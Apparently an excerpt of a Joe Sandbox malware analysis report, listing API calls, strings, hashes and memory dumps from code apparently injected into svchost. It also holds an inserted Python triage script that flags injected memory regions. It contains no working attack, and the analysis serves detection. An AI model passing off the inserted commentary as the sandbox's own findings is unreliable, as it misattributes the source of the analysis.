                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: fb6a9c524fc5d3484979de7ddd0c04845f897be2528b6da75aca7f880f4762e4
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 3D41FF22B11A1093EA56DB26A80C79523DDBB47FE1F0C41299D0FA7784EF3CC54D8386

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: 38e7ba86b214d779e40598ff6136bc5f85aa100ce0c60efaae3f90949e3f069e
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 0C113A76A18B8083E710CB61F50D35A7775F38AFA5F584315EA9A13AA8CFBCC148CB41
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A279
                                                                  • GetLastError.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,000002A66130A3B3,?,?,?,000002A661309B9C,?,?,?,?,000002A6613096BD), ref: 000002A66130A303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 21f7652a1c3b2d3b08e2bd85ed527b7237bdaf8575ce5e9d5578602fc49127b5
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 9031AD21B12A50A3EE129B46A80C75533ECB74AFA1F5D06349D1B6B3A1EF7DC1488382
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 8a448f16fba570ede5e25b879f06153b1a11ef346cff490b08676d39210bb097
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction Fuzzy Hash: 18117936B04B8087EF649B66E40C66972B9F78AF95F090428DE8E53794EF3DC648C705
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Current$Context
                                                                  • String ID:
                                                                  • API String ID: 1666949209-0
                                                                  • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction ID: 3b88e18f3e288b5316be95c728ea3f6a2be064616dc03a0298ce9d4779e724bd
                                                                  • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                                  • Instruction Fuzzy Hash: F6D1AA76608B8882EA70DB06E49835A77F4F389F85F140116EACE57B69CF3DC585CB81
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D3DF
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D415
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D442
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D453
                                                                  • FlsSetValue.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D464
                                                                  • SetLastError.KERNEL32(?,?,?,000002A66130DAE5,?,?,?,?,000002A66130DBA8), ref: 000002A66130D47F
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 2506987500-0
                                                                  • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction ID: becaec30be5092c1e4cac6dff0987991ecdd20111dfc16942f9dfa5579a7e985
                                                                  • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                                  • Instruction Fuzzy Hash: BF11AF20F0568043FA54A331A64D36922DE6B4AFF2F0D4328AC37377DADF2C94498687
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                  • String ID:
                                                                  • API String ID: 449555515-0
                                                                  • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction ID: db93e4b3c4a6dc20d81bcde0db7a7504087a0a358164d2d7daf917041e098eb2
                                                                  • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                                  • Instruction Fuzzy Hash: 4F016974B15B8487EB209B62E80D71933B8BB4AF46F080528C94E27365EF3DC14CC702
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction ID: 2bb15305fd1648b5f4597f4a9c6c99a4857e4ed9157c84268d7e5898f9ababa5
                                                                  • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                                  • Instruction Fuzzy Hash: 3451BD32F126408BEB15CB25E44CB98379DFB46F98F199120DA8643788DF38D9C9E706
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                  • String ID: displacement map'$csm$f
                                                                  • API String ID: 3242871069-3478954885
                                                                  • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction ID: 46947ff9c8787e56f9549501a482bedb074f50c7edd2e0661ed9604ccbab6123
                                                                  • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                                  • Instruction Fuzzy Hash: 0B317832B1168097E7149F21E84CB5937ACFB42F98F199014EE8647789CF3CC989D706
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CombinePath
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3422762182-91387939
                                                                  • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction ID: da98ef6b121364779e5a87a907428e844d129fab95bcf11ad97ec07c455dc5e3
                                                                  • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                                  • Instruction Fuzzy Hash: 8BF08CA0B04BC083EA108B53B94D11AB769BB8AFC0F0C8430EE5B27B28CF6CC449C701
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                  • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction ID: 27f13dda94eecf94b99b9bf4721527bf61351b2ee317b72a15c5a9166f734d31
                                                                  • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                                  • Instruction Fuzzy Hash: D661FA32A19B4487EB60DB15E44C31A77E4F389B85F140216EA8E57BA8CF7CC448CF81
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: _set_statfp
                                                                  • String ID:
                                                                  • API String ID: 1156100317-0
                                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction ID: f5a4be69ff799a498af4848c229d1a1df72a336720d2402a37a3c31005aff2c0
                                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                  • Instruction Fuzzy Hash: 3F11A332F14AC043FA589578E45E3A9148C7B57B75F4D0635AA66472FACF2C8BCC8106
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                  • String ID: csm$csm
                                                                  • API String ID: 3896166516-3733052814
                                                                  • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction ID: 9cbffc8ec5ff8bdd9c127497ebb7c631b0c93787ca9db867f2f84a2ddb5c21bb
                                                                  • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                                  • Instruction Fuzzy Hash: AC514D32E00280CBEB688B21D44C75C77ACEB96F94F199115EA5A47BE5CF3CD4998B42
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: e3bc9fb8a1330983b664812a075b31833c319c5b03025340e8eb6bef3a7db098
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: FB71A436B0078147EB64DE36995C3AA67D8F786F85F590016ED0B63B99DF38C608C781
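Added example, not Joe Sandbox code: a small decoder for the .sdmp dump names listed above, so the memory-dump sources can be triaged without clicking through each one. The field layout is an assumption inferred from the values on this page (the 8-hex-digit field after the address takes the values 40, 20, 04 and 02, which are the Win32 page-protection constants, and 00020000 matches MEM_PRIVATE); the decimal serial and the two remaining fields are left opaque. The dump names below are copied from this report; the pairing with the hcaresult_*.jbxd snapshot names is checked against the page.

```python
"""Decode Joe Sandbox .sdmp dump names (assumed layout, see lead-in)."""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

# proc.pass.serial.base.protect.f6.type.f8.sdmp  (field meaning is assumed)
_SDMP = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dpass>[0-9A-Fa-f]{8})\.(?P<serial>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    proc_index: int    # analysis process index (0x47 == 71 on this page)
    dump_pass: int     # dump pass number (2 and 3 appear on this page)
    base: int          # start address of the dumped region
    protect: int       # page protection (assumed)
    mem_type: int      # MEM_* region type (assumed)
    based_on_pe: bool  # the report's "based on PE: true/false" for the dump


def parse_sdmp(name: str, based_on_pe: bool = False) -> DumpRegion:
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not an sdmp name: {name}")
    return DumpRegion(int(m["proc"], 16), int(m["dpass"], 16), int(m["base"], 16),
                      int(m["protect"], 16), int(m["mtype"], 16), based_on_pe)


def protect_name(r: DumpRegion) -> str:
    return PAGE_PROTECT.get(r.protect & 0xFF, hex(r.protect))


def mem_type_name(r: DumpRegion) -> str:
    return MEM_TYPE.get(r.mem_type, hex(r.mem_type))


def suspicion(r: DumpRegion) -> list:
    """Triage flags: executable memory that is not backed by a mapped image is
    the usual footprint of injected code, and a PE layout inside such memory
    points at a manually mapped payload rather than a loaded DLL."""
    flags = []
    if (r.protect & 0xF0) and r.mem_type != MEM_IMAGE:   # any PAGE_EXECUTE* bit
        flags.append("executable non-image memory")
    if r.protect & 0xC0:                                 # RWX or WCX
        flags.append("writable and executable")
    if r.based_on_pe and r.mem_type != MEM_IMAGE:
        flags.append("PE image in non-image memory (manual map / injection)")
    return flags


def snapshot_name(r: DumpRegion, image_base: int, process: str = "svchost") -> str:
    """Rebuild the IDA-plugin snapshot name the report pairs with a dump. The
    page keys it on the image base (the 'Offset' line), not the region base."""
    return f"hcaresult_{r.proc_index}_{r.dump_pass}_{image_base:x}_{process}.jbxd"


def image_layout(regions, image_base: int) -> list:
    """Section-like layout of one injected image from its associated dumps:
    (offset from image base, protection), sorted by offset."""
    rows = [(r.base - image_base, protect_name(r)) for r in regions if r.base >= image_base]
    return sorted(rows)


# Dump names copied from this report (the primary dump plus its associated regions).
REPORT_DUMPS = [
    ("00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp", True),
    ("00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp", False),
    ("00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp", False),
    ("00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp", False),
    ("00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp", False),
    ("00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp", False),
]
IMAGE_BASE = 0x2A661300000


def report_layout() -> list:
    return image_layout([parse_sdmp(n, pe) for n, pe in REPORT_DUMPS], IMAGE_BASE)


if __name__ == "__main__":
    for name, pe in REPORT_DUMPS:
        r = parse_sdmp(name, pe)
        print(f"{r.base:#x} {protect_name(r):24} {mem_type_name(r):12} {suspicion(r)}")
    print(report_layout())
```

Run against the names on this page, the 0x2A6612D0000 dump from pass 3 decodes as a PAGE_EXECUTE_READWRITE private region that the report nonetheless parses as a PE, while the pass-2 image at 0x2A661300000 decodes into a read-only header page, an executable page range at +0x1000 and a writable range at +0x21000: the layout of a mapped executable sitting in private memory of svchost, consistent with the injection signatures listed at the top of the report.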
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: 43e1584eca2d796283e50f3f8a8e87af42aa333ef39e15b5d83a4208803e4e45
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 4C617932E04B848BEB60CF65D04879D77A9FB46B88F184215EF4913BA9DF78C498C702
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: 7c2625f02462df714b302d873d198b90f073f5d4d3204461980f9b2b93d85b0e
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: AB614221E25FCA8ED5639B39A46D265571CBF53BC5F49D307E80A33A71EF1C928B8201
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000002.2940302898.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                                   • Associated: 00000047.00000002.2940213578.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940434300.000002A661316000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940531148.000002A661321000.00000004.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940671747.000002A661323000.00000002.00000001.00020000.00000000.sdmp
                                                                   • Associated: 00000047.00000002.2940751974.000002A661329000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_2_2a661300000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 00729653e197ad33754e76cd4d703fb91cc2a543f0faa093d2894e13b45c3028
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: B741F572B14A8087DB20DF65E44D3AA77A4F39AB84F984021EE4E97798EF7CC449C741
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 113830a2bc3ebd6b24b96ba9216da5ed91371c25bace9118cfc115a3cc460421
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 6FE04F61B51B84D1DF018F22E4882D833A8DB6AB54B4C9122995C07311EB3CD2EDC341
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: b2701e076f2f8afd4d212f12c153584a0888d6f8d6490ee9c89ab05963efd12b
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 6EE04F61B11B44C1DB018F21D4841982368EB6AB54B889122C95C07311EB3CD2E9C341
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000047.00000003.1780006679.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_71_3_2a6612d0000_svchost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
